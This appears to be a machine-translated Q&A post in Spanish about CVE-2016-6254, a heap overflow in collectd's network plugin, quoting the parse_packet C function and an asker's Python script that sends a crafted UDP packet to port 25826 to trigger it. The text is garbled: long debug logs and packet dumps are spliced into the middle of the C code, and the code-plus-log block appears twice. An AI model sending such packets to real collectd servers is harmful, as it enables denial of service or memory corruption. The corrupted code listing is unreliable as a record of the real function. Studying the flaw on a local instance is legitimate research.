CVE-2016-6254 - Descripción del desbordamiento de montón

Question

CVE-2016-6254 - Descripción del desbordamiento de montón

#1 de grochmal (2 votos)

1

Intentando entender este fragmento de código:

Contiene una vulnerabilidad de desbordamiento de búfer de pila:

static int parse_packet (sockent_t *se, /* {{{ */
        void *buffer, size_t buffer_size, int flags,
        const char *username)
{
    int status;

    value_list_t vl = VALUE_LIST_INIT;
    notification_t n;

#if HAVE_LIBGCRYPT
    int packet_was_signed = (flags & PP_SIGNED);
        int packet_was_encrypted = (flags & PP_ENCRYPTED);
    int printed_ignore_warning = 0;
#endif /* HAVE_LIBGCRYPT */


    memset (&vl, '  parse_packet()
bufer_size:260
packet_was_encrypted:0
packet_was_signed:0
se->data.server.security_level:0
While() 0
buffer_size:260
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3400005C4400005C5400005C6400005C7400005C8400005C9400005CA400005CB400005CC400005CD400005CE400005CF400005D0400005D1400005D2400005D3400005D4400005D5400005D6400005D7400005D8400005D9400005DA400005DB400005DC400005DD400005DE400005DF400005E0400005E1400005E2400005E3400005E4400005E5400005E6400005E7400005E8400005E9400005EA400005EB400005EC400005ED400005EE400005EF400005F0400005F1400005F2400005F3400005F4400005F5400005F6400005F7400005F8400005F9400005FA400005FB400005FC400005FD400005FE400005FF40000600400006014000060240000603
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:260
While() 1
buffer_size:196
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:196
While() 2
buffer_size:132
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F420005404200054142000542420005434200054442000545420005464200054742000548420005494200054A4200054B4200054C4200054D4200054E4200054F420005504200055142000552420005534200055442000555420005564200055742000558420005594200055A4200055B4200055C4200055D4200055E4200055F420005604200056142000562420005634200056442000565420005664200056742000568420005694200056A4200056B4200056C4200056D4200056E4200056F420005704200057142000572420005734200057442000575420005764200057742000578420005794200057A4200057B4200057C4200057D4200057E4200057F42000580420005814200058242000583
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:132
While() 3
buffer_size:66
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F4200054042000541
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:66
', sizeof (vl));
    memset (&n, 'option = Hostname; value = 127.0.0.1;
option = FQDNLookup; value = true;
option = BaseDir; value = /opt/collectd/var/lib/collectd;
option = PIDFile; value = /opt/collectd/var/run/collectd.pid;
Done parsing '/opt/collectd/share/collectd/types.db'
Created new plugin context.
parse_packet()
bufer_size:260
packet_was_encrypted:0
packet_was_signed:0
se->data.server.security_level:0
While() 0
buffer_size:260
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3400005C4400005C5400005C6400005C7400005C8400005C9400005CA400005CB400005CC400005CD400005CE400005CF400005D0400005D1400005D2400005D3400005D4400005D5400005D6400005D7400005D8400005D9400005DA400005DB400005DC400005DD400005DE400005DF400005E0400005E1400005E2400005E3400005E4400005E5400005E6400005E7400005E8400005E9400005EA400005EB400005EC400005ED400005EE400005EF400005F0400005F1400005F2400005F3400005F4400005F5400005F6400005F7400005F8400005F9400005FA400005FB400005FC400005FD400005FE400005FF40000600400006014000060240000603
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:260
While() 1
buffer_size:196
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:196
While() 2
buffer_size:132
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F420005404200054142000542420005434200054442000545420005464200054742000548420005494200054A4200054B4200054C4200054D4200054E4200054F420005504200055142000552420005534200055442000555420005564200055742000558420005594200055A4200055B4200055C4200055D4200055E4200055F420005604200056142000562420005634200056442000565420005664200056742000568420005694200056A4200056B4200056C4200056D4200056E4200056F420005704200057142000572420005734200057442000575420005764200057742000578420005794200057A4200057B4200057C4200057D4200057E4200057F42000580420005814200058242000583
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:132
While() 3
buffer_size:66
Packet dump:430005004300050143000502430005034300050443000505430005064300050743000508430005094300050A4300050B4300050C4300050D4300050E4300050F430005104300051143000512430005134300051443000515430005164300051743000518430005194300051A4300051B4300051C4300051D4300051E4300051F430005204300052143000522430005234300052443000525430005264300052743000528430005294300052A4300052B4300052C4300052D4300052E4300052F430005304300053143000532430005334300053443000535430005364300053743000538430005394300053A4300053B4300053C4300053D4300053E4300053F4300054043000541
pkg_length:17152
pkg_type:1280
pkg_length(ntohs):67
pkg_type(ntohs):5
Break pkg_length > buffer_size
', sizeof (n));
    status = 0;

    while ((status == 0) && (0 < buffer_size)
            && ((unsigned int) buffer_size > sizeof (part_header_t)))
    {
        uint16_t pkg_length;
        uint16_t pkg_type;

        memcpy ((void *) &pkg_type,
                (void *) buffer,
                sizeof (pkg_type));
        memcpy ((void *) &pkg_length,
                (void *) (buffer + sizeof (pkg_type)),
                sizeof (pkg_length));

        pkg_length = ntohs (pkg_length);
        pkg_type = ntohs (pkg_type);

        if (pkg_length > buffer_size)
            break;
        /* Ensure that this loop terminates eventually */
        if (pkg_length < (2 * sizeof (uint16_t)))
            break;

        if (pkg_type == TYPE_ENCR_AES256)
        {
            status = parse_part_encr_aes256 (se,
                    &buffer, &buffer_size, flags);
            if (status != 0)
            {
                ERROR ("network plugin: Decrypting AES256 "
                        "part failed "
                        "with status %i.", status);
                break;
            }
        }
#if HAVE_LIBGCRYPT
        else if ((se->data.server.security_level == SECURITY_LEVEL_ENCRYPT)
                && (packet_was_encrypted == 0))
        {
            if (printed_ignore_warning == 0)
            {
                INFO ("network plugin: Unencrypted packet or "
                        "part has been ignored.");
                printed_ignore_warning = 1;
            }
            buffer = ((char *) buffer) + pkg_length;
            continue;
        }
#endif /* HAVE_LIBGCRYPT */
        else if (pkg_type == TYPE_SIGN_SHA256)
        {
            status = parse_part_sign_sha256 (se,
                                        &buffer, &buffer_size, flags);
            if (status != 0)
            {
                ERROR ("network plugin: Verifying HMAC-SHA-256 "
                        "signature failed "
                        "with status %i.", status);
                break;
            }
        }
#if HAVE_LIBGCRYPT
        else if ((se->data.server.security_level == SECURITY_LEVEL_SIGN)
                && (packet_was_encrypted == 0)
                && (packet_was_signed == 0))
        {
            if (printed_ignore_warning == 0)
            {
                INFO ("network plugin: Unsigned packet or "
                        "part has been ignored.");
                printed_ignore_warning = 1;
            }
            buffer = ((char *) buffer) + pkg_length;
            continue;
        }
#endif /* HAVE_LIBGCRYPT */
        else if (pkg_type == TYPE_VALUES)
        {
            status = parse_part_values (&buffer, &buffer_size,
                    &vl.values, &vl.values_len);
            if (status != 0)
                break;

            network_dispatch_values (&vl, username);

            sfree (vl.values);
        }
        else if (pkg_type == TYPE_TIME)
        {
            uint64_t tmp = 0;
            status = parse_part_number (&buffer, &buffer_size,
                    &tmp);
            if (status == 0)
            {
                vl.time = TIME_T_TO_CDTIME_T (tmp);
                n.time  = TIME_T_TO_CDTIME_T (tmp);
            }
        }
        else if (pkg_type == TYPE_TIME_HR)
        {
            uint64_t tmp = 0;
            status = parse_part_number (&buffer, &buffer_size,
                    &tmp);
            if (status == 0)
            {
                vl.time = (cdtime_t) tmp;
                n.time  = (cdtime_t) tmp;
            }
        }
        else if (pkg_type == TYPE_INTERVAL)
        {
            uint64_t tmp = 0;
            status = parse_part_number (&buffer, &buffer_size,
                    &tmp);
            if (status == 0)
                vl.interval = TIME_T_TO_CDTIME_T (tmp);
        }
        else if (pkg_type == TYPE_INTERVAL_HR)
        {
            uint64_t tmp = 0;
            status = parse_part_number (&buffer, &buffer_size,
                    &tmp);
            if (status == 0)
                vl.interval = (cdtime_t) tmp;
        }
        else if (pkg_type == TYPE_HOST)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    vl.host, sizeof (vl.host));
            if (status == 0)
                sstrncpy (n.host, vl.host, sizeof (n.host));
        }
        else if (pkg_type == TYPE_PLUGIN)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    vl.plugin, sizeof (vl.plugin));
            if (status == 0)
                sstrncpy (n.plugin, vl.plugin,
                        sizeof (n.plugin));
        }
        else if (pkg_type == TYPE_PLUGIN_INSTANCE)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    vl.plugin_instance,
                    sizeof (vl.plugin_instance));
            if (status == 0)
                sstrncpy (n.plugin_instance,
                        vl.plugin_instance,
                        sizeof (n.plugin_instance));
        }
        else if (pkg_type == TYPE_TYPE)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    vl.type, sizeof (vl.type));
            if (status == 0)
                sstrncpy (n.type, vl.type, sizeof (n.type));
        }
        else if (pkg_type == TYPE_TYPE_INSTANCE)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    vl.type_instance,
                    sizeof (vl.type_instance));
            if (status == 0)
                sstrncpy (n.type_instance, vl.type_instance,
                        sizeof (n.type_instance));
        }
        else if (pkg_type == TYPE_MESSAGE)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    n.message, sizeof (n.message));

            if (status != 0)
            {
                /* do nothing */
            }
            else if ((n.severity != NOTIF_FAILURE)
                    && (n.severity != NOTIF_WARNING)
                    && (n.severity != NOTIF_OKAY))
            {
                INFO ("network plugin: "
                        "Ignoring notification with "
                        "unknown severity %i.",
                        n.severity);
            }
            else if (n.time <= 0)
            {
                INFO ("network plugin: "
                        "Ignoring notification with "
                        "time == 0.");
            }
            else if (strlen (n.message) <= 0)
            {
                INFO ("network plugin: "
                        "Ignoring notification with "
                        "an empty message.");
            }
            else
            {
                plugin_dispatch_notification (&n);
            }
        }
        else if (pkg_type == TYPE_SEVERITY)
        {
            uint64_t tmp = 0;
            status = parse_part_number (&buffer, &buffer_size,
                    &tmp);
            if (status == 0)
                n.severity = (int) tmp;
        }
        else
        {
            DEBUG ("network plugin: parse_packet: Unknown part"
                    " type: 0x%04hx", pkg_type);
            buffer = ((char *) buffer) + pkg_length;
        }
    } /* while (buffer_size > sizeof (part_header_t)) */

    if (status == 0 && buffer_size > 0)
        WARNING ("network plugin: parse_packet: Received truncated "
                "packet, try increasing 'MaxPacketSize'");

    return (status);
} /* }}} int parse_packet */

Fue parcheado con esto:

enlace

Pasé un tiempo investigándolo pero no puedo encontrar el error ...

¿Alguien puede ayudar?

Actualización 1:

Gracias por las respuestas, especialmente @grochmal

Mi intento de hacer un desbordamiento de búfer / desbordamiento de pila:

import socket

UDP_IP = "127.0.0.1"
UDP_PORT = 25826

print "UDP target IP:", UDP_IP
print "UDP target port:", UDP_PORT

sock = socket.socket(socket.AF_INET, # Internet
             socket.SOCK_DGRAM) # UDP

str="\x00\x05\x00\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x40\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x63\x00\x00\x05\x00\x40\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x06\x00\x33\x00\x50\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40"


sock.sendto(str,(UDP_IP, UDP_PORT))

Pero de alguna manera no puedo pasar el búfer ... si configuro el pkg_lenght en el último paquete a 67, obtengo esto:

static int parse_packet (sockent_t *se, /* {{{ */
        void *buffer, size_t buffer_size, int flags,
        const char *username)
{
    int status;

    value_list_t vl = VALUE_LIST_INIT;
    notification_t n;

#if HAVE_LIBGCRYPT
    int packet_was_signed = (flags & PP_SIGNED);
        int packet_was_encrypted = (flags & PP_ENCRYPTED);
    int printed_ignore_warning = 0;
#endif /* HAVE_LIBGCRYPT */


    memset (&vl, '  parse_packet()
bufer_size:260
packet_was_encrypted:0
packet_was_signed:0
se->data.server.security_level:0
While() 0
buffer_size:260
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3400005C4400005C5400005C6400005C7400005C8400005C9400005CA400005CB400005CC400005CD400005CE400005CF400005D0400005D1400005D2400005D3400005D4400005D5400005D6400005D7400005D8400005D9400005DA400005DB400005DC400005DD400005DE400005DF400005E0400005E1400005E2400005E3400005E4400005E5400005E6400005E7400005E8400005E9400005EA400005EB400005EC400005ED400005EE400005EF400005F0400005F1400005F2400005F3400005F4400005F5400005F6400005F7400005F8400005F9400005FA400005FB400005FC400005FD400005FE400005FF40000600400006014000060240000603
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:260
While() 1
buffer_size:196
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:196
While() 2
buffer_size:132
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F420005404200054142000542420005434200054442000545420005464200054742000548420005494200054A4200054B4200054C4200054D4200054E4200054F420005504200055142000552420005534200055442000555420005564200055742000558420005594200055A4200055B4200055C4200055D4200055E4200055F420005604200056142000562420005634200056442000565420005664200056742000568420005694200056A4200056B4200056C4200056D4200056E4200056F420005704200057142000572420005734200057442000575420005764200057742000578420005794200057A4200057B4200057C4200057D4200057E4200057F42000580420005814200058242000583
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:132
While() 3
buffer_size:66
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F4200054042000541
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:66
', sizeof (vl));
    memset (&n, 'option = Hostname; value = 127.0.0.1;
option = FQDNLookup; value = true;
option = BaseDir; value = /opt/collectd/var/lib/collectd;
option = PIDFile; value = /opt/collectd/var/run/collectd.pid;
Done parsing '/opt/collectd/share/collectd/types.db'
Created new plugin context.
parse_packet()
bufer_size:260
packet_was_encrypted:0
packet_was_signed:0
se->data.server.security_level:0
While() 0
buffer_size:260
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3400005C4400005C5400005C6400005C7400005C8400005C9400005CA400005CB400005CC400005CD400005CE400005CF400005D0400005D1400005D2400005D3400005D4400005D5400005D6400005D7400005D8400005D9400005DA400005DB400005DC400005DD400005DE400005DF400005E0400005E1400005E2400005E3400005E4400005E5400005E6400005E7400005E8400005E9400005EA400005EB400005EC400005ED400005EE400005EF400005F0400005F1400005F2400005F3400005F4400005F5400005F6400005F7400005F8400005F9400005FA400005FB400005FC400005FD400005FE400005FF40000600400006014000060240000603
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:260
While() 1
buffer_size:196
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:196
While() 2
buffer_size:132
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F420005404200054142000542420005434200054442000545420005464200054742000548420005494200054A4200054B4200054C4200054D4200054E4200054F420005504200055142000552420005534200055442000555420005564200055742000558420005594200055A4200055B4200055C4200055D4200055E4200055F420005604200056142000562420005634200056442000565420005664200056742000568420005694200056A4200056B4200056C4200056D4200056E4200056F420005704200057142000572420005734200057442000575420005764200057742000578420005794200057A4200057B4200057C4200057D4200057E4200057F42000580420005814200058242000583
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:132
While() 3
buffer_size:66
